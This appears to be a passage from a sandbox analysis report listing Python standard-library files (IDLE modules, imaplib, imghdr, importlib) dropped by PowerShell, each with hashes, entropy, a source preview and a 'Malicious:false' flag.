                              Preview:"""Search dialog for Find, Find Again, and Find Selection.. functionality..... Inherits from SearchDialogBase for GUI and uses searchengine.. to prepare search pattern..."""..from tkinter import TclError....from idlelib import searchengine..from idlelib.searchbase import SearchDialogBase....def _setup(text):.. """Return the new or existing singleton SearchDialog instance..... The singleton dialog saves user entries and preferences.. across instances..... Args:.. text: Text widget containing the text to be searched... """.. root = text._root().. engine = searchengine.get(root).. if not hasattr(engine, "_searchdialog"):.. engine._searchdialog = SearchDialog(root, engine).. return engine._searchdialog....def find(text):.. """Open the search dialog..... Module-level function to access the singleton SearchDialog.. instance and open the dialog. If text is selected, it is.. used as the search phrase; otherwise, the previous entry..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8066
                              Entropy (8bit):4.572939815710139
                              Encrypted:false
                              SSDEEP:192:6LqBb6fcgH4kkWU+AH0shFwJhZafEyGberC:IqwfBZkTzHxhFwPIfEyG6e
                              MD5:BD72F06AE14B226D4983C0E3BEB8E6E5
                              SHA1:5FEF42A2D7591D1D1E9B36BDCDC75A33359B1DB3
                              SHA-256:A1EDEA131EBDCDE39C640487822D5509165089BA322B33EE568AC1F3C049BA90
                              SHA-512:46F3AAE69FA5A5FC06CBB232E7199A371426067079D4FC274FE1BDBD6483E1254462D2CCAB787B51BAFB46B1DD65177941D7C2BFC5A52D1D995CA16560181976
                              Malicious:false
                              Preview:'''Define SearchDialogBase used by Search, Replace, and Grep dialogs.'''....from tkinter import Toplevel..from tkinter.ttk import Frame, Entry, Label, Button, Checkbutton, Radiobutton..from tkinter.simpledialog import _setup_dialog......class SearchDialogBase:.. '''Create most of a 3 or 4 row, 3 column search dialog..... The left and wide middle column contain:.. 1 or 2 labeled text entry lines (make_entry, create_entries);.. a row of standard Checkbuttons (make_frame, create_option_buttons),.. each of which corresponds to a search engine Variable;.. a row of dialog-specific Check/Radiobuttons (create_other_buttons)..... The narrow right column contains command buttons.. (make_button, create_command_buttons)... These are bound to functions that execute the command..... Except for command buttons, this base class is not limited to items.. common to all three subclasses. Rather, it is the Find dialog minus.. the "Find Next" command, its execution func
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7650
                              Entropy (8bit):4.291873346315346
                              Encrypted:false
                              SSDEEP:192:wvD2MsspKaToFzSWXuPWwyidF4yeLU2OKPTQy9y:U4akte6inI0v
                              MD5:AD093E3E382FEB49C54C51570B778B36
                              SHA1:E44BDA2C07177763A11EEFE0132F7A562B994D9B
                              SHA-256:7188F8116170DC003A2C16003E3C12424A6FAC06E048757CFEB8B5FF41ACA661
                              SHA-512:70AC84D52FC01AEE3306DEBA3B508B56A341428BACF70AB1B459785587F3DEE129D2DDC153D11048722E48C9B6A633D6D00477F800C42E42622BED0ADF0D47F7
                              Malicious:false
                              Preview:'''Define SearchEngine for search dialogs.'''..import re..re.PatternError = re.error # New in 3.13.....from tkinter import StringVar, BooleanVar, TclError..from tkinter import messagebox....def get(root):.. '''Return the singleton SearchEngine instance for the process..... The single SearchEngine saves settings between dialog instances... If there is not a SearchEngine already, make one... '''.. if not hasattr(root, "_searchengine"):.. root._searchengine = SearchEngine(root).. # This creates a cycle that persists until root is deleted... return root._searchengine......class SearchEngine:.. """Handles searching a text widget for Find, Replace, and Grep.""".... def __init__(self, root):.. '''Initialize Variables that save search state..... The dialogs bind these to the UI elements present in the dialogs... '''.. self.root = root # need for report_error().. self.patvar = StringVar(root, '') # search pattern..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):20882
                              Entropy (8bit):4.5536257788045225
                              Encrypted:false
                              SSDEEP:384:6xWWNImtWCZ3XoVP0zUBXIPbPveTumxOh28GOk3dd:SKcOPiS4PbPyumgIVT3P
                              MD5:267FED045E6C6E38C86E7DDC00E4C91E
                              SHA1:F5C7B0E700BEBF06731AF5ABD386D8A2980701E4
                              SHA-256:FE752E047D588E54F67E1A2B30AEC32AA8BF70242437F496AFB131BAF86C31DE
                              SHA-512:24D7ADFB63F8EB2E7872594534BC7880A52E628C7B6FC1F8297C1EFFE69F410719DF6B170D07A4347ED02333C63721E4137B1E0E62AD5CB5D6C832462077ED0E
                              Malicious:false
                              Preview:"""Line numbering implementation for IDLE as an extension...Includes BaseSideBar which can be extended for other sidebar based extensions.."""..import contextlib..import functools..import itertools....import tkinter as tk..from tkinter.font import Font..from idlelib.config import idleConf..from idlelib.delegator import Delegator..from idlelib import macosx......def get_lineno(text, index):.. """Return the line number of an index in a Tk text widget.""".. text_index = text.index(index).. return int(float(text_index)) if text_index else None......def get_end_linenumber(text):.. """Return the number of the last line in a Tk text widget.""".. return get_lineno(text, 'end-1c')......def get_displaylines(text, index):.. """Display height, in lines, of a logical line in a Tk text widget.""".. res = text.count(f"{index} linestart",.. f"{index} lineend",.. "displaylines").. return res[0] if res else 0....def get_widget_padding(widge
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):13179
                              Entropy (8bit):4.474664667987323
                              Encrypted:false
                              SSDEEP:192:kH5cqNXb+F/88t/+7kBwNTZprBhPRvfTHZFb9aU:kZZNX631ZBwXppvb5FJ
                              MD5:E5B38047C54D24A3247F1E941C9A6A36
                              SHA1:E219AAA39EBF4D47049D3DE30A7B8326D01C17EE
                              SHA-256:F0CD9C085CF31DE1411066074805BB9813E2916142787B06D23D817756A66AF6
                              SHA-512:6D38CE40A6369EADD51B766B22A97342DA5BBB37EFD25AC8EDAB426589A648577BA223B7736DD54741AEAD4EBAC45FA4582229B1E7826D49A1DDF0564B332CAA
                              Malicious:false
                              Preview:"""An IDLE extension to avoid having very long texts printed in the shell.....A common problem in IDLE's interactive shell is printing of large amounts of..text into the shell. This makes looking at the previous history difficult...Worse, this can cause IDLE to become very slow, even to the point of being..completely unusable.....This extension will automatically replace long texts with a small button...Double-clicking this button will remove it and insert the original text instead...Middle-clicking will copy the text to the clipboard. Right-clicking will open..the text in a separate viewing window.....Additionally, any output can be manually "squeezed" by the user. This includes..output written to the standard error stream ("stderr"), such as exception..messages and their tracebacks..."""..import re....import tkinter as tk..from tkinter import messagebox....from idlelib.config import idleConf..from idlelib.textview import view_text..from idlelib.tooltip import Hovertip..from idlelib i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4150
                              Entropy (8bit):4.509368683470403
                              Encrypted:false
                              SSDEEP:96:VovRDAIh4KvXRpdq98mv68Tx6q0rX9GBa/VGBFR3evg:VlIhNc8my8TYqQX9GgwFheI
                              MD5:01644CBBFA1B4C0871471E9CA617728D
                              SHA1:DD60001473E23D675CCC03FC11F0CAE8F85D3C46
                              SHA-256:69AD3E73DCA76D13C340A4B38BA0515FFB82735F0BD079443A6FCF60B37BED4C
                              SHA-512:B701815F9B8C0207F6D37B802E905B5D84F5EFDE0A389986AE8BDC91CBC50FAF9A0643147AC4BA9DFD7221B12F52BF8DB745B54209A899C6CAECAC02A9853799
                              Malicious:false
                              Preview:# Rename to stackbrowser or possibly consolidate with browser.....import linecache..import os....import tkinter as tk....from idlelib.debugobj import ObjectTreeItem, make_objecttreeitem..from idlelib.tree import TreeNode, TreeItem, ScrolledCanvas....def StackBrowser(root, exc, flist=None, top=None):.. global sc, item, node # For testing... if top is None:.. top = tk.Toplevel(root).. sc = ScrolledCanvas(top, bg="white", highlightthickness=0).. sc.frame.pack(expand=1, fill="both").. item = StackTreeItem(exc, flist).. node = TreeNode(sc.canvas, None, item).. node.expand()......class StackTreeItem(TreeItem):.... def __init__(self, exc, flist=None):.. self.flist = flist.. self.stack = self.get_stack(None if exc is None else exc.__traceback__).. self.text = f"{type(exc).__name__}: {str(exc)}".... def get_stack(self, tb):.. stack = [].. if tb and tb.tb_frame is None:.. tb = tb.tb_next.. while tb is not Non
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1526
                              Entropy (8bit):4.718614237791998
                              Encrypted:false
                              SSDEEP:24:1ReOmAXAVjTKy6bj/jD6MOM1JWXMkjnsEp8sr4ebwK+fwrCLtkr+j4FgqHST1ae4:xmAaXvsyMObMosEppr4ef+fwAk24Wqy6
                              MD5:CA96DB739E918298DBAAA33F5D5019A0
                              SHA1:AB9C2B40E679F7DA8682E5598EDD518BD0161034
                              SHA-256:0E02720448E1AF6F60311FB8A1E92D992295599E40F43EB9F11E6B9597532C9E
                              SHA-512:CADD33B2F6A824B633A00C8EF8DDB504D7330B457D6D3703FCC838611BACD1AE66694AF4554F08F559243056F8AD9A34C06F879EF42039256E4DCCF0E3602333
                              Malicious:false
                              Preview:from tkinter.ttk import Label, Frame......class MultiStatusBar(Frame):.... def __init__(self, master, **kw):.. Frame.__init__(self, master, **kw).. self.labels = {}.... def set_label(self, name, text='', side='left', width=0):.. if name not in self.labels:.. label = Label(self, borderwidth=0, anchor='w').. label.pack(side=side, pady=0, padx=4).. self.labels[name] = label.. else:.. label = self.labels[name].. if width != 0:.. label.config(width=width).. label.config(text=text)......def _multistatus_bar(parent): # htest #.. from tkinter import Toplevel, Text.. from tkinter.ttk import Frame, Button.. top = Toplevel(parent).. x, y = map(int, parent.geometry().split('+')[1:]).. top.geometry("+%d+%d" %(x, y + 175)).. top.title("Test multistatus bar").... frame = Frame(top).. text = Text(frame, height=5, width=40).. text.pack().. msb = MultiStatusBar(frame)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7001
                              Entropy (8bit):4.590203356618743
                              Encrypted:false
                              SSDEEP:96:Ser4kTj541sB2ALqhGNp06D192CkkTuznFjpCFjO7yRSKEniqXti:zjNQALNNpJDn2vkM1pwKyA1nFXI
                              MD5:C9FA767ABF303DF34A81EBAF8E3A8E98
                              SHA1:5A4CF83ED58F0B48C8544773637C4734B2C00D3B
                              SHA-256:35A0B4636E5232BFCF7E8B39C3645C7831ED18218EDAD644EE64B748692B20B2
                              SHA-512:FCD1B64DEA5936FB13E952F39A78E34A252EFB1C90ECA135C58F6073CA0DBF9FF04AF56B3550C9113925AEC3923EEB118E3612231C53D8738DFD7A10032F5C18
                              Malicious:false
                              Preview:"""Simple text browser for IDLE...."""..from tkinter import Toplevel, Text, TclError,\.. HORIZONTAL, VERTICAL, NS, EW, NSEW, NONE, WORD, SUNKEN..from tkinter.ttk import Frame, Scrollbar, Button..from tkinter.messagebox import showerror....from idlelib.colorizer import color_config......class AutoHideScrollbar(Scrollbar):.. """A scrollbar that is automatically hidden when not needed..... Only the grid geometry manager is supported... """.. def set(self, lo, hi):.. if float(lo) > 0.0 or float(hi) < 1.0:.. self.grid().. else:.. self.grid_remove().. super().set(lo, hi).... def pack(self, **kwargs):.. raise TclError(f'{self.__class__.__name__} does not support "pack"').... def place(self, **kwargs):.. raise TclError(f'{self.__class__.__name__} does not support "place"')......class ScrollableTextFrame(Frame):.. """Display text with scrollbar(s).""".... def __init__(self, master, wrap=NONE, **kwargs):..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6657
                              Entropy (8bit):4.541708667002856
                              Encrypted:false
                              SSDEEP:192:agWIKYUwFemoSIIHwvRhsmoHRssbVMuOF1i:dsb6HwnoHd
                              MD5:B0157721A415E9B316CA1E06C3BFC716
                              SHA1:A30E3AAD7DFE53013D8390F4BDFEC2532848B51A
                              SHA-256:AB16D34C2325F556ABCD7469480915C0D85D8736E650BD9B28FE4C059A4828B0
                              SHA-512:9B712D79FD003663A02276E068F74708034E59BDEFDBB3A91E1DF72E051E315B17B30149D4739E07459056FABCFD6E03148FBAE89382015F54647B3DF9C588CF
                              Malicious:false
                              Preview:"""Tools for displaying tool-tips.....This includes:.. * an abstract base-class for different kinds of tooltips.. * a simple text-only Tooltip class.."""..from tkinter import *......class TooltipBase:.. """abstract base class for tooltips""".... def __init__(self, anchor_widget):.. """Create a tooltip..... anchor_widget: the widget next to which the tooltip will be shown.... Note that a widget will only be shown when showtip() is called... """.. self.anchor_widget = anchor_widget.. self.tipwindow = None.... def __del__(self):.. self.hidetip().... def showtip(self):.. """display the tooltip""".. if self.tipwindow:.. return.. self.tipwindow = tw = Toplevel(self.anchor_widget).. # show no border on the top level window.. tw.wm_overrideredirect(1).. try:.. # This command is only needed and available on Tk >= 8.4.0 for OSX... # Without it, call tips intrude
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16986
                              Entropy (8bit):4.58007386731682
                              Encrypted:false
                              SSDEEP:192:pcjkQRMJC9P9baC/1CPkC99AMdzSdM5jB71dUSoHBIxy4u1J1cg0QmKqhR:2gSbOD7dcdM5jB71dUSoHEu3OFQa
                              MD5:09320EE44E1FC2C32EADB4EE3FE1F754
                              SHA1:310A06F1498AF7279614AC5E395D835FBF9F0DCB
                              SHA-256:818A97B1C5FA983C14230187BE218B4E9D93029C83F8D61F543D5E48F903F931
                              SHA-512:2E2D173C9722176D5CFB6CAFC301F721FB7335C5AF50154358CD6E6680FF61521448906A91642B34BCD195BBF19296924D42696147143978789EB9DB4C983294
                              Malicious:false
                              Preview:# XXX TO DO:..# - popup menu..# - support partial or total redisplay..# - key bindings (instead of quick-n-dirty bindings on Canvas):..# - up/down arrow keys to move focus around..# - ditto for page up/down, home/end..# - left/right arrows to expand/collapse & move out/in..# - more doc strings..# - add icons for "file", "module", "class", "method"; better "python" icon..# - callback for selection???..# - multiple-item selection..# - tooltips..# - redo geometry without magic numbers..# - keep track of object ids to allow more careful cleaning..# - optimize tree redraw after expand of subnode....import os....from tkinter import *..from tkinter.ttk import Frame, Scrollbar....from idlelib.config import idleConf..from idlelib import zoomheight....ICONDIR = "Icons"....# Look for Icons subdirectory in the same directory as this module..try:.. _icondir = os.path.join(os.path.dirname(__file__), ICONDIR)..except NameError:.. _icondir = ICONDIR..if os.path.isdir(_icondir):.. ICONDI
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11383
                              Entropy (8bit):4.511719236201391
                              Encrypted:false
                              SSDEEP:192:DEd/PNOjjQnL/qgNr7NW5dxDNjDdX09yIhlZsH8laGI:DEhNOnTxX8DZc
                              MD5:EA05DC2E3F25E1CD6230F73E26568F56
                              SHA1:9389E80A4CEDB61D63AF876E391430C7B0E682DC
                              SHA-256:966CDBDF0984B3ABE6B87B4A9CC816F6D177FFB15420096B742C9E9F0ADD06B3
                              SHA-512:68889960E16CDB1CEAA705A1F76D22235A576AD5911BC25F39D79C6E53A5DFB26FE8D4E0196AEE233D26C4ABDB74BA0C0F04FB993001392793711AD2CD05A99E
                              Malicious:false
                              Preview:import string....from idlelib.delegator import Delegator....# tkinter import not needed because module does not create widgets,..# although many methods operate on text widget arguments.....#$ event <<redo>>..#$ win <Control-y>..#$ unix <Alt-z>....#$ event <<undo>>..#$ win <Control-z>..#$ unix <Control-z>....#$ event <<dump-undo-state>>..#$ win <Control-backslash>..#$ unix <Control-backslash>......class UndoDelegator(Delegator):.... max_undo = 1000.... def __init__(self):.. Delegator.__init__(self).. self.reset_undo().... def setdelegate(self, delegate):.. if self.delegate is not None:.. self.unbind("<<undo>>").. self.unbind("<<redo>>").. self.unbind("<<dump-undo-state>>").. Delegator.setdelegate(self, delegate).. if delegate is not None:.. self.bind("<<undo>>", self.undo_event).. self.bind("<<redo>>", self.redo_event).. self.bind("<<dump-undo-state>>", self.dump_event)....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):753
                              Entropy (8bit):4.722288748345001
                              Encrypted:false
                              SSDEEP:12:UlUf+Eun9e2ANhTH+AXF+UpQjRyT20+SXq+R6Fo+7Fm2+3Vf7hALFwWh2a/jFBb5:UlUf+TeRrL/XFhPq0bsFpFm2QVqL2apj
                              MD5:DA9E17743C92A739E71598EE6DD72729
                              SHA1:0C358DE8B7A671E02B355D4DA29B0A91C08FD04B
                              SHA-256:546CE11669CD8988D97E62E0A42F6E74EEF40595D4273DE7CA93ED218498F950
                              SHA-512:4AC8C8A3680C4B3D9C65CB24BB46DDD337E4C75C3364D86F3BE982AA9EF1E074C8812606F92C189AA8DFD5C309048ACA3DFBC56D97DE400989CB81534D58CF11
                              Malicious:false
                              Preview:"""..Idlelib objects with no external idlelib dependencies..which are needed in more than one idlelib module.....They are included here because.. a) they don't particularly belong elsewhere; or.. b) because inclusion here simplifies the idlelib dependency graph.....TODO:.. * Python versions (editor and help_about),.. * tk version and patchlevel (pyshell, help_about, maxos?, editor?),.. * std streams (pyshell, run),.. * warning stuff (pyshell, run)..."""....# .pyw is for Windows; .pyi is for typing stub files...# The extension order is needed for iomenu open/save dialogs...py_extensions = ('.py', '.pyw', '.pyi')....if __name__ == '__main__':.. from unittest import main.. main('idlelib.idle_test.test_util', verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2714
                              Entropy (8bit):4.364875797912291
                              Encrypted:false
                              SSDEEP:48:RFG4V7uS3t1XfTm7wpb9pv8exu3MTsMCm+W/Ocd7/QE7I:RFG4Mo3mspb9pvCcsNm+2hNI
                              MD5:C8EEEFB89218A863B90D43F2F614B810
                              SHA1:3F867D48D54D68CBF45A07B873243FFA03AD506C
                              SHA-256:85919A4F823AA687DEFADB6716E2B01B0FE74C21E7EBDA950B8CBEEDD1EFB3F2
                              SHA-512:D71CDBAA878B39674C2C7108543B7681C54866D7BB69DDCA211D7BC9A701F057E8B601592949BC0CA1B76842D5FDE13ECD774CDDD8CFAF69F77DCBA0A7672081
                              Malicious:false
                              Preview:from tkinter import Toplevel, TclError..import sys......class WindowList:.... def __init__(self):.. self.dict = {}.. self.callbacks = [].... def add(self, window):.. window.after_idle(self.call_callbacks).. self.dict[str(window)] = window.... def delete(self, window):.. try:.. del self.dict[str(window)].. except KeyError:.. # Sometimes, destroy() is called twice.. pass.. self.call_callbacks().... def add_windows_to_menu(self, menu):.. list = [].. for key in self.dict:.. window = self.dict[key].. try:.. title = window.get_title().. except TclError:.. continue.. list.append((title, key, window)).. list.sort().. for title, key, window in list:.. menu.add_command(label=title, command=window.wakeup).... def register_callback(self, callback):.. self.callbacks.append(callback)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4327
                              Entropy (8bit):4.400672770818723
                              Encrypted:false
                              SSDEEP:96:XEmcp8//FNMFJc4f/dxj5l6zdR5e3LChSBZ5:Xns8//GJcS155lodten
                              MD5:201370943D09BB9AA42BC66F53934AE2
                              SHA1:3CCC4E7A1285680BCC815DF75433B0AA17C823F0
                              SHA-256:E3A6E578F3FEA8A1F834CBA273C5722CCAB726A394956637EEB02650B7E3B60D
                              SHA-512:BED4D3D7D7688BBC8E11D768557AE77C868AD34DE925EA22586D3B89B0C7F1D5EA4B345B0CE4126E4A69F31C933937C5FFFB6D93F7F08AA657AD2E7CAE2B8D83
                              Malicious:false
                              Preview:"Zoom a window to maximum height."....import re..import sys..import tkinter......class WmInfoGatheringError(Exception):.. pass......class ZoomHeight:.. # Cached values for maximized window dimensions, one for each set.. # of screen dimensions... _max_height_and_y_coords = {}.... def __init__(self, editwin):.. self.editwin = editwin.. self.top = self.editwin.top.... def zoom_height_event(self, event=None):.. zoomed = self.zoom_height().... if zoomed is None:.. self.top.bell().. else:.. menu_status = 'Restore' if zoomed else 'Zoom'.. self.editwin.update_menu_label(menu='options', index='* Height',.. label=f'{menu_status} Height').... return "break".... def zoom_height(self):.. top = self.top.... width, height, x, y = get_window_geometry(top).... if top.wm_state() != 'normal':.. # Can't zoom/restore window height for wind
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2078
                              Entropy (8bit):4.566681866757483
                              Encrypted:false
                              SSDEEP:48:0BeUBtdoBcXHs4Q70JD9Xpd5r7CiwJa3oeBanFHyQx:0BewEW8p70J5XvYZE5MFHz
                              MD5:14BF96284FBE73F8A04B4FCA75165305
                              SHA1:FB232E504B35355164C8D38350E5751A558A8358
                              SHA-256:CD44C3950F2380FBC654D444D8917CD3A144B88CA523917D522537BFBB41F519
                              SHA-512:8910D7132E71D9C65F79D838942BAFCCBF0F2F2AA236C1A396819B1A26E642B1BF100BDE3B8C66CA7819DA3CBA2661DBBBB40223F5FB2ED0CF44EDC1ADF5A937
                              Malicious:false
                              Preview:"""Example extension, also used for testing.....See extend.txt for more details on creating an extension...See config-extension.def for configuring an extension..."""....from idlelib.config import idleConf..from functools import wraps......def format_selection(format_line):.. "Apply a formatting function to all of the selected lines.".... @wraps(format_line).. def apply(self, event=None):.. head, tail, chars, lines = self.formatter.get_region().. for pos in range(len(lines) - 1):.. line = lines[pos].. lines[pos] = format_line(self, line).. self.formatter.set_region(head, tail, chars, lines).. return 'break'.... return apply......class ZzDummy:.. """Prepend or remove initial text from selected lines.""".... # Extend the format menu... menudefs = [.. ('format', [.. ('Z in', '<<z-in>>'),.. ('Z out', '<<z-out>>'),.. ] ).. ].... def __init__(self, editwin):.. "Initialize t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):55320
                              Entropy (8bit):4.698963047894621
                              Encrypted:false
                              SSDEEP:1536:LxnlDansQeIBol2eKsBKOgE1IFWv4wem8fCY17JTBY:L9lWsQ5el2eKs4OgE1IFwDem8fN5Ri
                              MD5:3A49CC9459497FBB42C7ADA13F6FCEA8
                              SHA1:74751D80FB62412994BC1716B1AF9052E8C579FC
                              SHA-256:12C34D60B9F7BE521F898E13D72B7F1D2BBEDC87C71F9C00140FFB4593E2FB3C
                              SHA-512:E2DBDC1099C574BD02A90F9C41D6CC4D827A3177C009C6C6F11CA5870DA95869CFEB774638D0DAD5CC33C5BC731000897323AE6B17AC817B2B1FDD8C2454BCF3
                              Malicious:false
                              Preview:"""IMAP4 client.....Based on RFC 2060.....Public class: IMAP4..Public variable: Debug..Public functions: Internaldate2tuple.. Int2AP.. ParseFlags.. Time2Internaldate.."""....# Author: Piers Lauder <piers@cs.su.oz.au> December 1997...#..# Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998...# String method conversion by ESR, February 2001...# GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001...# IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002...# GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002...# PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002...# GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005.....__version__ = "2.58"....import binascii, errno, random, re, socket, subprocess, sys, time, calendar..from datetime import datetime, timezone, tim
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4578
                              Entropy (8bit):4.76441763929676
                              Encrypted:false
                              SSDEEP:96:MwbND3M4HLBZ6Wl/wH6wLZ6L3KkZPaQG6q8GjHjKkz:MWD77IhQCpjHjKkz
                              MD5:316394ACA6BF6A5AF7996A6143E0AECE
                              SHA1:6B119E846026FCF24034E4F7292E996D92C6E6E1
                              SHA-256:F6BE0B302E7D4B7F0A9A32085AD69BEBBC735E704B9BE68510E3D9009C3E83F4
                              SHA-512:7EBE465294186E5D83FEE8BA5DFE92CE67FFA9F6A99B963C7495227D3930224AAA4B1F17F516D9EB1FF16C6F708A696BEAACFFE96CF99FFAF862B31D002DD01F
                              Malicious:false
                              Preview:"""Recognize image file formats based on their first few bytes."""....from os import PathLike..import warnings....__all__ = ["what"]......warnings._deprecated(__name__, remove=(3, 13))......#-------------------------#..# Recognize image headers #..#-------------------------#....def what(file, h=None):.. """Return the type of image contained in a file or byte stream.""".. f = None.. try:.. if h is None:.. if isinstance(file, (str, PathLike)):.. f = open(file, 'rb').. h = f.read(32).. else:.. location = file.tell().. h = file.read(32).. file.seek(location).. for tf in tests:.. res = tf(h, f).. if res:.. return res.. finally:.. if f: f.close().. return None......#---------------------------------#..# Subroutines per image file type #..#---------------------------------#....tests = []....def test_jpeg(h, f):.. """Test f
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4912
                              Entropy (8bit):4.6319009488503635
                              Encrypted:false
                              SSDEEP:96:4tH2fRvVSnhV4kSSNOyKGk+SNplpIZvYZwPbBbrx1x410aKZt9RH++3mTatLxhV:glz4vSNGGXSNV4bRrp41vKZt9RJmOtVb
                              MD5:BCA19823F6D3DA9AC57114B681CF3F4F
                              SHA1:4B4AC01ABE65A7CE3752343F9681EAD705274E0E
                              SHA-256:96DC7E6276BEAF680D6576917173FD67B1260BC3B10BB7324F481C424ECB3F4E
                              SHA-512:B995194B78FCFA4C5E66B84DDF2FAC2AEA2C51E20BB26DA6FF57AC4ED195ADD3D9375A12CA9FFB3DFE7A485BF4741727682EF7CF1175C5C9AEFD9A282ED3E574
                              Malicious:false
                              Preview:"""A pure Python implementation of import."""..__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']....# Bootstrap help #####################################################....# Until bootstrapping is complete, DO NOT import any modules that attempt..# to import importlib._bootstrap (directly or indirectly). Since this..# partially initialised package would be present in sys.modules, those..# modules would get an uninitialised copy of the source version, instead..# of a fully initialised version (either the frozen one or the one..# initialised below if the frozen one is not available)...import _imp # Just the builtin component, NOT the full Python module..import sys....try:.. import _frozen_importlib as _bootstrap..except ImportError:.. from . import _bootstrap.. _bootstrap._setup(sys, _imp)..else:.. # importlib._bootstrap is the built-in import, ensure we don't create.. # a second copy of the module... _bootstrap.__name__ = 'importlib._bootstrap
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4604
                              Entropy (8bit):5.669797918679033
                              Encrypted:false
                              SSDEEP:96:ohxU9e1bkBCmgxK1sWAS+CZCxDzm2xA9P8M+XALOPYa:Kk0JK1FAS+RxmIukwe
                              MD5:64D514A7CB73371EA6AB6513B655CB79
                              SHA1:72DBA4DFF6FF2815A1401E008AB6D6B8934A3BA4
                              SHA-256:09D2EBAFB65AC255A19AD8BA73542470E9359C95FF5D997457FECCEF3ADF45A0
                              SHA-512:FC056BCF7F17EE8D2CED692CB4EF31498CC775734E98A290C44A56991ABFDE354F98028AD2AA1DBFD2418652C4C4587F5B746A0D593B094103E53FDE57EA75FF
                              Malicious:false
                              Preview:.........U.f0.........................,.....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.e._.........d.e._...........e.j...................d.d.........e._.........e.e.j...................d.<.....d.d.l.Z.d.e._.........d.e._...........e.j...................d.d.........e._.........e.e.j...................d.<...e.j$..................Z.e.j&..................Z.d.d.l.Z.d.d.l.m.Z...d...Z.d.d...Z.i.Z.d...Z.y.#.e.$.r...Y...w.x.Y.w.#.e.$.r...d.d.l.m.Z.....e.j...................e.e...........Y...w.x.Y.w.#.e.$.r...Y..tw.x.Y.w.#.e.$.r"..d.d.l.m.Z.....e.j"..................e...........e.e._.........Y...w.x.Y.w.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....Nz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py.....)..._bootstrapz.importlib._bootstrap_externalz._bootstrap_external.py)..._bootstrap_external).r....c.....................h.....t.........j...................D.]...}.t.........|.d.........s...|.j..............................!..y.).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1682
                              Entropy (8bit):5.129938721233459
                              Encrypted:false
                              SSDEEP:24:hCJUrqm4haCXN2TrX/I7ChNIu8CiqIwxb9FReg+L+CVVR9Vz8R1wtAjZn:cJUOnsTrDCqj9FKx9R8R1yYn
                              MD5:270E8795DCC53622C83AAB1F40CAD782
                              SHA1:8BA032F150D80A0A1277D80F4CDD4B8EB6402A7A
                              SHA-256:9DBE9C4E380C4778DF3DEFB0E5D711849D4F74FB624A2F926E282667054776EC
                              SHA-512:86368107149EC80FB188363BAB645AB56C2F6148FA6FF083DB849F630C5B446B7BBD9EAC05D8AFBA9E4DCAAEE3515DCD7A64B74EC9C6014F6782AD2B09F90FA2
                              Malicious:false
